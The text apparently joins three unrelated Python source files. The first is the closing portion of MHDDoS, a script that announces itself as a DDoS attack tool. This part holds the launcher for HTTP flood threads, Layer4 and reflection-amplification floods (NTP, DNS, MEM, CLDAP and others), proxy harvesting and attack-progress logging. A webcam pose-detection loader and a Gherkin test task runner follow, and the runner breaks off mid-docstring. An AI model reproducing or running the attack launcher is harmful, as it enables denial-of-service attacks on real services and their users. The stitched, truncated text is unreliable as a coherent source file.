info = ToolsConsole.ts_srv(domain)
logger.info(f"TCP: {(info['_tsdns._tcp.'])}\n")
logger.info(f"UDP: {(info['_ts3._udp.'])}\n")
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
logger.info("please wait ...")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n') %
(r.address, r.avg_rtt, r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print((
'* MHDDoS - DDoS Attack Script With %d Methods\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' SocksTypes:\n'
' - 6 = RANDOM\n'
' - 5 = SOCKS5\n'
' - 4 = SOCKS4\n'
' - 1 = HTTP\n'
' - 0 = ALL\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n'
' L4: python3 %s <method> <ip:port> <threads> <duration>\n'
' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n'
' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with'
' Amplification)>\n') %
(len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0], argv[0], argv[0], argv[0]))
# noinspection PyBroadException
@staticmethod
def ts_srv(domain):
records = ['_ts3._udp.', '_tsdns._tcp.']
DnsResolver = resolver.Resolver()
DnsResolver.timeout = 1
DnsResolver.lifetime = 1
Info = {}
for rec in records:
try:
srv_records = resolver.resolve(rec + domain, 'SRV')
for srv in srv_records:
Info[rec] = str(srv.target).rstrip('.') + ':' + str(
srv.port)
except:
Info[rec] = 'Not found'
return Info
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
def handleProxyList(con, proxy_li, proxy_ty, url=None):
if proxy_ty not in {4, 5, 1, 0, 6}:
exit("Socks Type Not Found [4, 5, 1, 0, 6]")
if proxy_ty == 6:
proxy_ty = randchoice([4, 5, 1])
if not proxy_li.exists():
logger.warning("The file doesn't exist, creating files and downloading proxies.")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
logger.info(
f"{len(Proxies):,} Proxies are getting checked, this may take awhile!"
)
Proxies = ProxyChecker.checkAll(
Proxies, timeout=1, threads=threads,
url=url.human_repr() if url else "http://httpbin.org/get",
)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem"
" | The target may not be available."
)
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if proxies:
logger.info(f"Proxy Count: {len(proxies):,}")
else:
logger.info(
"Empty Proxy File, running flood witout proxy")
proxies = None
return proxies
if __name__ == '__main__':
with open(__dir__ / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP":
raise IndexError()
if one == "TOOLS":
ToolsConsole.runConsole()
if one == "STOP":
ToolsConsole.stop()
method = one
host = None
url = None
event = Event()
event.clear()
target = None
urlraw = argv[2].strip()
if not urlraw.startswith("http"):
urlraw = "http://" + urlraw
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" %
", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
url = URL(urlraw)
host = url.host
try:
host = gethostbyname(url.host)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(__dir__ / "files/proxies/" /
argv[5].strip())
useragent_li = Path(__dir__ / "files/useragent.txt")
referers_li = Path(__dir__ / "files/referers.txt")
bombardier_path = Path.home() / "go/bin/bombardier"
proxies: Any = set()
if method == "BOMB":
assert (
bombardier_path.exists()
or bombardier_path.with_suffix('.exe').exists()
), (
"Install bombardier: "
"https://github.com/MHProDev/MHDDoS/wiki/BOMB-method"
)
if len(argv) == 9:
logger.setLevel("DEBUG")
if not useragent_li.exists():
exit("The Useragent file doesn't exist ")
if not referers_li.exists():
exit("The Referer file doesn't exist ")
uagents = set(a.strip()
for a in useragent_li.open("r+").readlines())
referers = set(a.strip()
for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if threads > 1000:
logger.warning("Thread is higher than 1000")
if rpc > 100:
logger.warning(
"RPC (Request Pre Connection) is higher than 100")
proxies = handleProxyList(con, proxy_li, proxy_ty, url)
for thread_id in range(threads):
HttpFlood(thread_id, url, host, method, rpc, event,
uagents, referers, proxies).start()
if method in Methods.LAYER4_METHODS:
target = URL(urlraw)
port = target.port
target = target.host
try:
target = gethostbyname(target)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
if port > 65535 or port < 1:
exit("Invalid Port [Min: 1 / Max: 65535] ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket():
exit("Cannot Create Raw Socket")
threads = int(argv[3])
timer = int(argv[4])
proxies = None
ref = None
if not port:
logger.warning("Port Not Selected, Set To Default: 80")
port = 80
if len(argv) >= 6:
argfive = argv[5].strip()
if argfive:
refl_li = Path(__dir__ / "files" / argfive)
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
if not refl_li.exists():
exit("The reflector file doesn't exist")
if len(argv) == 7:
logger.setLevel("DEBUG")
ref = set(a.strip()
for a in ProxyTools.Patterns.IP.findall(
refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
elif argfive.isdigit() and len(argv) >= 7:
if len(argv) == 8:
logger.setLevel("DEBUG")
proxy_ty = int(argfive)
proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
proxies = handleProxyList(con, proxy_li, proxy_ty)
if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
exit("this method cannot use for layer4 proxy")
else:
logger.setLevel("DEBUG")
for _ in range(threads):
Layer4((target, port), ref, method, event,
proxies).start()
logger.info(
"Attack Started to %s with %s method for %s seconds, threads: %d!"
% (target or url.human_repr(), method, timer, threads))
event.set()
ts = time()
while time() < ts + timer:
logger.debug('PPS: %s, BPS: %s / %d%%' %
(Tools.humanformat(int(REQUESTS_SENT)),
Tools.humanbytes(int(BYTES_SEND)),
round((time() - ts) / timer * 100, 2)))
REQUESTS_SENT.set(0)
BYTES_SEND.set(0)
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
webcam_detector.py | from itertools import count
from threading import Thread
from queue import Queue
import os
import cv2
import numpy as np
import time
import torch
import torch.multiprocessing as mp
from loguru import logger
from alphapose.utils.presets import SimpleTransform
from multiprocessing.synchronize import Event as EventType
from config.apis import get_detector
## fork from alphapose.util.webcam_detector
class WebCamDetectionLoader():
def __init__(self,pose_cfg, opt):
self.cfg = pose_cfg
self.opt = opt
self._input_size = pose_cfg.DATA_PRESET.IMAGE_SIZE
self._output_size = pose_cfg.DATA_PRESET.HEATMAP_SIZE
self._sigma = pose_cfg.DATA_PRESET.SIGMA
if pose_cfg.DATA_PRESET.TYPE == 'simple':
self.transformation = SimpleTransform(
self, scale_factor=0,
input_size=self._input_size,
output_size=self._output_size,
rot=0, sigma=self._sigma,
train=False, add_dpg=False)
self._stopped = mp.Value('b', False)
if(opt.realtime==True):self.opt.inqsize=2
self.pose_queue = mp.Queue(maxsize=self.opt.inqsize)
self.loadedEvent = mp.Event()
self.runningEvent = mp.Event()
self.detector = None
# self.__set_input(input_source)
# self.path = mp.Value('i',-1)
self.path = mp.Queue(maxsize=1)
def __set_input(self,input_source):
stream = cv2.VideoCapture(input_source)
assert stream.isOpened(), 'Cannot capture source'
# self.path.value = int(input_source)
logger.info('input:{}',input_source)
self.path.put(input_source)
stream.release()
def start_worker(self, target):
p = mp.Process(target=target,name='WebCamDetector',args=())
p.start()
return p
def start(self,startEvent=None):
# start a thread to pre process images for object detection
self.startEvent = startEvent
logger.info('start:')
print(self.startEvent)
image_preprocess_worker = self.start_worker(self.frame_preprocess)
# self.image_preprocess_worker = image_preprocess_worker
return [image_preprocess_worker]
def run(self,input_source):
self.__set_input(input_source)
self.runningEvent.set()
@logger.catch
def stop(self):
# end threads
self._stopped.value = True
self.runningEvent.set()
self.clear_queues()
self.pose_queue.put((None, None, None, None, None, None,None))
# self.image_preprocess_worker.join()
# clear queues
def terminate(self):
self._stopped.value = True
self.stop()
def clear_queues(self):
self.clear(self.pose_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def wait_and_put(self, queue, item):
if not self.stopped:
queue.put(item)
queue.get() if self.opt.realtime and queue.qsize()>1 else time.sleep(0.01)
def wait_and_get(self, queue):
if not self.stopped:
return queue.get()
def __load_model(self):
self.detector = get_detector(self.opt)
self.detector.load_model() ##
def hangUp(self):
self.runningEvent.clear()
self.clear_queues()
def onStop(self):
self.clear_queues()
logger.debug('on stop')
self.pose_queue.put((None, None, None, None, None, None,None))
@logger.catch
def frame_preprocess(self):
logger.info('%s Process (%s)' % (self.__class__,os.getpid()))
if (self.detector is None):self.__load_model()
self.loadedEvent.set()
if(isinstance(self.startEvent,EventType)):self.startEvent.wait()
while True:
assert self.startEvent.is_set(),'Detector not started'
self.runningEvent.wait()
if self.stopped:
self.onStop()
return
inputpath = self.path.get()
logger.info('input:{}',inputpath)
stream = cv2.VideoCapture(inputpath)
assert stream.isOpened(), 'Cannot capture source'
for i in count():
if self.stopped: #停止
stream.release()
self.onStop()
return
if not self.runningEvent.is_set(): #暂停
stream.release()
self.hangUp()
break
if not self.pose_queue.full():
(grabbed, frame) = stream.read()
if not grabbed: #往输出队列放入空对象,continue
logger.debug('not grabbed')
self.wait_and_put(self.pose_queue, (None, None, None, None, None, None, None))
stream.release()
return
#预处理
# expected frame shape like (1,3,h,w) or (3,h,w)
img_k = self.detector.image_preprocess(frame)
if isinstance(img_k, np.ndarray):
img_k = torch.from_numpy(img_k)
# add one dimension at the front for batch if image shape (3,h,w)
if img_k.dim() == 3:
img_k = img_k.unsqueeze(0)
im_dim_list_k = frame.shape[1], frame.shape[0]
orig_img = frame[:, :, ::-1]
im_name = str(i) + '.jpg'
with torch.no_grad():
# Record original image resolution
im_dim_list_k = torch.FloatTensor(im_dim_list_k).repeat(1, 2)
img_det = self.image_detection((img_k, orig_img, im_name, im_dim_list_k)) #目标检测
self.image_postprocess(img_det) #后处理
def image_detection(self, inputs):
img, orig_img, im_name, im_dim_list = inputs
if img is None or self.stopped:
return (None, None, None, None, None, None, None)
with torch.no_grad():
dets = self.detector.images_detection(img, im_dim_list)
if isinstance(dets, int) or dets.shape[0] == 0:
return (orig_img, im_name, None, None, None, None, None)
if isinstance(dets, np.ndarray):
dets = torch.from_numpy(dets)
dets = dets.cpu()
boxes = dets[:, 1:5]
scores = dets[:, 5:6]
if self.opt.tracking:
ids = dets[:, 6:7]
else:
ids = torch.zeros(scores.shape)
boxes_k = boxes[dets[:, 0] == 0]
if isinstance(boxes_k, int) or boxes_k.shape[0] == 0:
return (orig_img, im_name, None, None, None, None, None)
inps = torch.zeros(boxes_k.size(0), 3, *self._input_size)
cropped_boxes = torch.zeros(boxes_k.size(0), 4)
return (orig_img, im_name, boxes_k, scores[dets[:, 0] == 0], ids[dets[:, 0] == 0], inps, cropped_boxes)
    def image_postprocess(self, inputs):
        """Crop each detected person box out of the frame and queue the batch.

        Pushes (inps, orig_img, im_name, boxes, scores, ids, cropped_boxes)
        onto the pose queue; sentinel tuples are queued for end-of-stream and
        for frames with no detections so the consumer can keep draining.
        """
        with torch.no_grad():
            (orig_img, im_name, boxes, scores, ids, inps, cropped_boxes) = inputs
            if orig_img is None or self.stopped:
                # end of stream (or stop requested): forward the all-None sentinel
                logger.debug('not grabbed')
                self.wait_and_put(self.pose_queue, (None, None, None, None, None, None, None))
                return
            if boxes is None or boxes.nelement() == 0:
                # frame with no detections: forward the frame with empty results
                self.wait_and_put(self.pose_queue, (None, orig_img, im_name, boxes, scores, ids, None))
                return
            # imght = orig_img.shape[0]
            # imgwidth = orig_img.shape[1]
            for i, box in enumerate(boxes):
                # crop/resize one person region into the pre-allocated batch tensor
                inps[i], cropped_box = self.transformation.test_transform(orig_img, box)
                cropped_boxes[i] = torch.FloatTensor(cropped_box)
            # inps, cropped_boxes = self.transformation.align_transform(orig_img, boxes)
            self.wait_and_put(self.pose_queue, (inps, orig_img, im_name, boxes, scores, ids, cropped_boxes))
    def read(self):
        """Block until the next postprocessed item is available and return it."""
        return self.wait_and_get(self.pose_queue)
    @property
    def stopped(self):
        """Whether the stop flag has been set.

        self._stopped looks like a shared multiprocessing.Value set from
        another process — TODO confirm.
        """
        return self._stopped.value
@property
def joint_pairs(self):
"""Joint pairs which defines the pairs of joint to be swapped
when the image is flipped horizontally."""
return [[1, 2], [3, 4], [5, 6], [7, 8],
[9, 10], [11, 12], [13, 14], [15, 16]]
|
task_runner.py | import datetime
import os
import glob
from typing import Any, Optional, Union
from gherkin.token_scanner import TokenScanner
from gherkin.parser import Parser
from .junit_report import JUnitReport
from .feedback_adapter import FeedbackAdapter
from .scenario_result import ScenarioResult
from .feedback_schema import FeatureInfo, ScenarioFeedback
import inspect
from .helpers import excludeKeys
from .report import Report
from .testresult_info import TestResultInfo
from .timeline import Timeline
from .task import Task
from .scenario_context import ScenarioContext
import threading
import concurrent
from .color import bcolors
from concurrent.futures import ThreadPoolExecutor, wait, ProcessPoolExecutor
from .scenario import Scenario
from itertools import groupby
import multiprocessing
from gherkin.token_matcher import TokenMatcher
from gherkin.dialect import Dialect
from .custom_keywords import concurrent_keywords, match_stepline
from .dependency_graph import DependencyGraph
import uuid
import time
import signal
from .task_monitor import TaskMonitor
from .task_runner_config import TaskRunnerConfig
from .feedback import Feedback
from dataclasses import asdict
# Monkey-patch the gherkin parser so the custom concurrency keywords and the
# extended step-line matcher are used for every feature file parsed below.
Dialect.concurrent_keywords = concurrent_keywords
TokenMatcher.match_StepLine = match_stepline
class TaskRunner:
    def __init__(self,debugMode=False,timeout=3600) -> None:
        """Create a task runner.

        Args:
            debugMode: when True, verbose timestamped diagnostics are printed.
            timeout: max seconds to wait for outstanding tasks to complete.
        """
        self.parser = Parser()
        # ids of tasks that have finished (or were skipped)
        self.completedTasks: list[str] = []
        # group name -> list of member task ids (for @dependsGroups_)
        self.groups = {}
        # @concurrent scenarios run on threads, @parallel ones on processes
        self.pool = ThreadPoolExecutor()
        self.parallelPool = ProcessPoolExecutor(max_workers=multiprocessing.cpu_count(),mp_context=multiprocessing.get_context("spawn"))
        self.taskReport = []
        self.setupTasks: list[Task] = []
        self.teardownTasks: list[Task] = []
        self.allTaskIds: list[str] = []
        self.mainTasks: list[Task] = []
        self.debugMode: bool = debugMode
        self.testResult: TestResultInfo = None
        self.timeout = timeout
        self.taskMonitor = TaskMonitor()
        self.feedback = Feedback()
def run(self, options: Union[list[str],TaskRunnerConfig]) -> TestResultInfo:
if isinstance(options,TaskRunnerConfig):
if len(options.featureFiles) > 0:
files = self.__getAllFeatureFiles(options.featureFiles)
for file in files:
self.__parse(file, options.onlyRunScenarioTags)
else:
files = self.__getAllFeatureFiles(options)
for file in files:
self.__parse(file, [])
start = time.time()
startDate = datetime.datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
self.taskMonitor.start()
self.feedback.startFeedback()
## run any setup tasks
error = self.__runSetupTasks()
if not error:
## run main tasks
self.__runMainTasks()
## run any teardown tasks
error = self.__runTeardownTasks()
end = time.time()
endDate = datetime.datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
self.taskMonitor.cancel()
self.taskMonitor.join()
self.taskMonitor.pids = list(dict.fromkeys(self.taskMonitor.pids))
for pid in self.taskMonitor.pids:
self.__print(f"kill process id: {pid}")
try:
os.kill(pid, signal.SIGTERM)
except:
pass
## print test report
self.__printTestReport()
self.testResult = TestResultInfo(
elapsed=end-start,
start=startDate,
end=endDate,
numCpu=multiprocessing.cpu_count(),
pid=os.getpid(),
success=len(list(filter(lambda x: "failed" in x["status"], self.taskReport))) <= 0
)
self.feedback.stopFeedback()
return self.testResult
def __getAllFeatureFiles(self, paths: list[str]) -> list[str]:
featureFiles: list[str] = []
for p in paths:
fullPath = os.path.abspath(p)
if os.path.isfile(fullPath):
if fullPath not in featureFiles:
featureFiles.append(fullPath)
elif os.path.isdir(fullPath):
files = glob.glob(fullPath + '/**/*.feature', recursive=True)
for file in files:
if file not in featureFiles:
featureFiles.append(file)
return featureFiles
def __parse(self, featureFile: str, onlyTags: list[str]):
result = self.parser.parse(TokenScanner(featureFile))
if not result:
return
if "feature" not in result:
return
if "children" not in result["feature"]:
return
feature = result["feature"]
for child in feature["children"]:
if "scenario" in child:
sc = child["scenario"]
self.__getScenario(sc, feature, onlyTags)
# def __getFeatureId(self, feature: Any) -> str:
# tags = feature["tags"]
# id=uuid.uuid4().hex()
# for tag in tags:
# tg = tag["name"]
# if temp := self.__getIdTag(tg, tag): id = temp
# return id
    def __getScenario(self, scenario: Any, feature: Any, onlyIncludeTags: list[str]) -> Optional[Task]:
        """Build a Task from a parsed scenario, honouring its control tags.

        Recognised tags: @concurrent, @parallel, @runAlways, @setup,
        @teardown, @id_<id>, @depends_<id>, @dependsGroups_<name>,
        @group_<name>.  Returns None when tag filtering excludes the
        scenario.
        """
        tags = scenario["tags"]
        # defaults: fresh random id, no deps/groups, plain sequential main task
        isConcurrent,id,depends,dependsGroups,group,runAlways,isSetup,isTeardown,isParallel = False,uuid.uuid4().hex,[],[],None,False,False,False,False
        # if scenario tag filtering is specified and a scenario has no tags at all, exclude it
        if len(onlyIncludeTags) > 0 and len(tags) <= 0:
            return None
        # filter scenario based on tags
        if len(onlyIncludeTags) > 0:
            if not any(item["name"] in onlyIncludeTags for item in tags):
                return None
        for tag in tags:
            tg = tag["name"]
            if temp := self.__getConcurrentTag(tg): isConcurrent = temp
            if temp := self.__getParallelTag(tg): isParallel = temp
            if temp := self.__getRunAlwaysTag(tg): runAlways = temp
            if temp := self.__getSetupTag(tg): isSetup = temp
            if temp := self.__getTeardownTag(tg): isTeardown = temp
            if temp := self.__getIdTag(tg, tag): id = temp
            if temp := self.__getDependsTag(tg, tag): depends.append(temp)
            if temp := self.__getDependsGroupsTag(tg, tag): dependsGroups.append(temp)
            if temp := self.__getGroupTag(tg, tag): group = temp
        sc = Scenario(scenario["name"],scenario,feature,id)
        t = Task(scenario["name"], sc, feature, id,depends,dependsGroups,runAlways,group, isSetup, isConcurrent,isTeardown,isParallel)
        self.allTaskIds.append(t.id)
        if group is not None:
            # remember group membership for @dependsGroups_ resolution
            self.groups.setdefault(group, []).append(id)
        # setup/teardown tasks are scheduled in their own phases
        if isSetup:
            self.setupTasks.append(t)
        elif isTeardown:
            self.teardownTasks.append(t)
        else:
            self.mainTasks.append(t)
        return t
def __getGroupTag(self, name: str, tag: Any) -> Optional[str]:
return tag["name"].split("@group_")[-1] if name.startswith("@group_") else None
def __getIdTag(self, name: str, tag: Any) -> Optional[str]:
return tag["name"].split("@id_")[-1] if name.startswith("@id_") else None
def __getConcurrentTag(self, name: str) -> bool:
return name == "@concurrent"
def __getParallelTag(self, name: str) -> bool:
return name == "@parallel"
def __getRunAlwaysTag(self, name: str) -> bool:
return name == "@runAlways"
def __getDependsTag(self, name: str, tag: Any) -> Optional[str]:
return tag["name"].split("@depends_")[-1] if name.startswith("@depends_") else None
def __getDependsGroupsTag(self, name: str, tag: Any) -> Optional[str]:
return tag["name"].split("@dependsGroups_")[-1] if name.startswith("@dependsGroups_") else None
def __getSetupTag(self, name: str) -> bool:
return name == "@setup"
def __getTeardownTag(self, name: str) -> bool:
return name == "@teardown"
    def __getNextTask(self,taskList) -> tuple[list[Task], list[Task]]:
        """Select the pending tasks whose dependencies are now satisfied.

        Returns:
            (runnable_tasks, remaining_taskList).  Tasks whose dependencies
            do not exist, or whose parents failed (and are not @runAlways),
            are reported as skipped and dropped from the pending list.
        """
        new_tasks: list[Task] = []
        skipped_tasks: list[Task] = []
        self.__print(f"tasks pending: {[(f'name: {t.name}',f'id:{t.id}') for t in taskList]}")
        for task in taskList:
            self.__print(f"check pending task: (name:{task.name},id:{task.id})")
            if len(task.depends) > 0:
                self.__print(f"task (name:{task.name},id:{task.id}) depends on: {task.depends}")
                # dependency ids that don't exist at all -> skip the task
                if not set(task.depends).issubset(self.allTaskIds):
                    self.__addTaskToReport(task, "skipped", None, 0.0, None)
                    skipped_tasks.append(task)
                    self.completedTasks.append(task.id)
                    continue
                # dependencies exist but are not all finished yet -> stay pending
                if not set(task.depends).issubset(self.completedTasks):
                    continue
                if self.__isParentTaskFailed(task.depends) and not task.runAlways:
                    self.__addTaskToReport(task, "skipped", None, 0.0, None)
                    self.__print(f"skip task: (name:{task.name},id:{task.id})")
                    skipped_tasks.append(task)
                    self.completedTasks.append(task.id)
                    continue
            if len(task.dependsGroups) > 0:
                self.__print(f"task (name:{task.name},id:{task.id}) depends on groups: {task.dependsGroups}")
                # flatten all referenced groups into one list of member task ids
                combine_groups = []
                for g in task.dependsGroups:
                    if g in self.groups:
                        combine_groups += self.groups[g]
                if not bool(combine_groups):
                    self.__print(f"no groups matching found for task: (name:{task.name},id:{task.id})")
                    self.__addTaskToReport(task, "skipped", None, 0.0, None)
                    skipped_tasks.append(task)
                    self.completedTasks.append(task.id)
                    continue
                if not set(combine_groups).issubset(self.completedTasks):
                    continue
                if self.__isParentTaskFailed(combine_groups) and not task.runAlways:
                    self.__addTaskToReport(task, "skipped", None, 0.0, None)
                    self.__print(f"dependent tasks failed so skip task: (name:{task.name},id:{task.id})")
                    skipped_tasks.append(task)
                    self.completedTasks.append(task.id)
                    continue
            new_tasks.append(task)
        # remove both scheduled and skipped tasks from the pending list
        if len(skipped_tasks) > 0:
            taskList = [i for i in taskList if not any(x.id == i.id for x in skipped_tasks)]
        if len(new_tasks) > 0:
            taskList = [i for i in taskList if not any(x.id == i.id for x in new_tasks)]
        return new_tasks, taskList
    def runWorkerThread(self, taskList):
        """Worker loop: submit runnable tasks to the thread/process pools and
        feed newly-unblocked tasks in as their dependencies complete.

        Stops when every task finished, or when the overall timeout elapses
        (remaining tasks are then reported as failed).
        """
        tasks_to_submit, taskList = self.__getNextTask(taskList)
        futures = {}
        for task in tasks_to_submit:
            if task.isConcurrent:
                futures[self.pool.submit(task.scenario.run,queue=None, feedbackQueue=self.feedback.messageQueue,context=self.__scenarioContextFromTask(task))] = task
            elif task.isParallel:
                futures[self.parallelPool.submit(task.scenario.run,queue=self.taskMonitor.signalQueue,feedbackQueue=self.feedback.messageQueue,context=self.__scenarioContextFromTask(task))] = task
        self.__print(f"adding new tasks: {[(f'name: {t.name}',f'id:{t.id}') for t in tasks_to_submit]}")
        self.__print(f"tasks in pool: {[(f'name: {t.name}',f'id:{t.id}') for t in futures.values()]}")
        startTime = time.time()
        currentTimeout = self.timeout
        while futures:
            done, notDone = wait(futures,return_when=concurrent.futures.FIRST_COMPLETED,timeout=currentTimeout)
            endTime = time.time()
            # NOTE(review): elapsed is measured from the loop start but is
            # compared against (and subtracted from) the shrinking
            # currentTimeout each iteration — confirm the bookkeeping matches
            # the intended overall timeout.
            elapsed = endTime-startTime
            self.__print(f"elapsed time waiting for task to complete: {elapsed}")
            if elapsed >= currentTimeout:
                for c in notDone:
                    self.__print(f"tasks not done: (name:{futures[c].name},id:{futures[c].id}, running:{c.running()},cancelled:{c.cancelled()})")
                    self.__addTaskToReport(futures[c],"failed","timeout waiting for task to complete",self.timeout, None)
                self.__print(f"timeout waiting {self.timeout} (s) for remaining tasks to complete. Aborting.")
                break
            currentTimeout = currentTimeout - elapsed
            self.__print(f"Remaining timeout: {currentTimeout}")
            for c in done:
                fut = futures.pop(c)
                result = c.result()
                print(result.message)
                self.__print(f"task completed: (name:{fut.name},id:{result.id})")
                self.completedTasks.append(result.id)
                if result.exception is not None:
                    self.__addTaskToReport(fut,"failed",result.exception,result.elapsed, result)
                else:
                    self.__addTaskToReport(fut,"success",result.exception,result.elapsed, result)
            # schedule any tasks the completions just unblocked
            next_tasks,taskList = self.__getNextTask(taskList)
            if next_tasks is not None:
                for t in next_tasks:
                    self.__print(f"adding new task (name:{t.name},id:{t.id})")
                    if t.isConcurrent:
                        item = self.pool.submit(t.scenario.run,queue=None,feedbackQueue=self.feedback.messageQueue,context=self.__scenarioContextFromTask(t))
                        futures[item] = t
                    elif t.isParallel:
                        item = self.parallelPool.submit(t.scenario.run,queue=self.taskMonitor.signalQueue,feedbackQueue=self.feedback.messageQueue,context=self.__scenarioContextFromTask(t))
                        futures[item] = t
            self.__print(f"remaining tasks in pool: {[(f'name: {t.name}',f'id:{t.id}') for t in futures.values()]}")
    def __printTestReport(self):
        """Print a colourised per-feature summary of every recorded task,
        including per-step details when a scenario result is attached."""
        print(f"Test report:\n")
        # group report entries by feature name (groupby needs the sort)
        for key, group in groupby(sorted(self.taskReport,key=lambda x:x["feature"]), lambda x: x["feature"]):
            print(f"\nFeature: {key}\n")
            for t in group:
                if t['status'] == 'success':
                    print(f"\tScenario: {t['name']}: {bcolors.OKGREEN}{t['status']}{bcolors.ENDC} (elapsed {t['elapsed']})")
                elif t['status'] == 'skipped':
                    print(f"\tScenario: {t['name']}: {bcolors.WARNING}{t['status']}{bcolors.ENDC} (elapsed {t['elapsed']})")
                else:
                    print(f"\tScenario: {t['name']}: {bcolors.FAIL}{t['status']}{bcolors.ENDC} (elapsed {t['elapsed']})")
                # if t['error'] is not None:
                #     print(f"\t\tError: {bcolors.FAIL}{t['error']}{bcolors.ENDC}")
                if 'scenario' in t and t["scenario"] is not None:
                    if t['scenario'].steps:
                        for step in t["scenario"].steps:
                            status = step['status']
                            if status == 'failed':
                                print(f"\t Step: {step['keyword']}{step['text']}{bcolors.FAIL} {step['status']}{bcolors.ENDC} (elapsed {step['elapsed']})")
                            elif status == 'skipped':
                                print(f"\t Step: {step['keyword']}{step['text']}{bcolors.WARNING} {step['status']}{bcolors.ENDC} (elapsed {step['elapsed']})")
                            else:
                                print(f"\t Step: {step['keyword']}{step['text']}{bcolors.OKGREEN} {step['status']}{bcolors.ENDC} (elapsed {step['elapsed']})")
                            if "error" in step and step['error'] is not None:
                                print(f"\t\t{bcolors.FAIL}{step['error']}{bcolors.ENDC}")
    def __scenarioContextFromTask(self,task: Task):
        """Build a ScenarioContext from a Task, keeping only the fields the
        ScenarioContext constructor actually declares."""
        data = excludeKeys(asdict(task),["name","scenario","feature"])
        return ScenarioContext(
            **{
                # parameters without a default must come from the task data;
                # optional ones fall back to their declared default
                key: (data[key] if val.default == val.empty else data.get(key, val.default))
                for key, val in inspect.signature(ScenarioContext).parameters.items()
            }
        )
def __print(self,msg: str):
if self.debugMode:
print(f"{bcolors.OKCYAN}[{datetime.datetime.now().strftime('%m/%d/%Y, %H:%M:%S')} task_manager] {msg}{bcolors.ENDC}\n")
def __isParentTaskFailed(self, groups):
ptask = []
for t in self.taskReport:
if 'id' in t:
if any(t['id'] == x for x in groups):
ptask.append(t)
return any(y['status'] == "failed" or y['status'] == "skipped" for y in ptask)
    def __addTaskToReport(self, task: Task, status: str, error: str, elapsed: float, scenarioResult: Any):
        """Record a task outcome once (keyed by name+feature) and publish a
        feedback event for it."""
        # first writer wins: a task already reported (e.g. timed out) is not overwritten
        if not any(task.name == x["name"] and task.feature["name"] == x["feature"] for x in self.taskReport):
            self.taskReport.append({"name":task.name,"status":status,"error":error, "elapsed": elapsed, "id": task.id, "feature": task.feature["name"], "task": task, "scenario": scenarioResult})
            self.feedback.notify(asdict(self.__feedbackSchemaFromTaskResult(task,scenarioResult,status,error,elapsed)))
    def __runMainTasks(self):
        # Main-phase scenarios (everything not tagged @setup/@teardown).
        return self.__runTasks(self.mainTasks)
    def __runSetupTasks(self):
        # Scenarios tagged @setup; run before the main phase.
        return self.__runTasks(self.setupTasks)
    def __runTeardownTasks(self):
        # Scenarios tagged @teardown; run after the main phase.
        return self.__runTasks(self.teardownTasks)
def __transformSeqTasks(self, taskList: list[Task]):
dependTaskId = None
for t in taskList:
t.isConcurrent = True
if dependTaskId is not None and len(t.depends) <= 0 and len(t.dependsGroups) <= 0:
t.depends.append(dependTaskId)
dependTaskId = t.id
return taskList
    def __runTasks(self, taskList):
        """Run one phase of tasks on a dedicated worker thread.

        Returns:
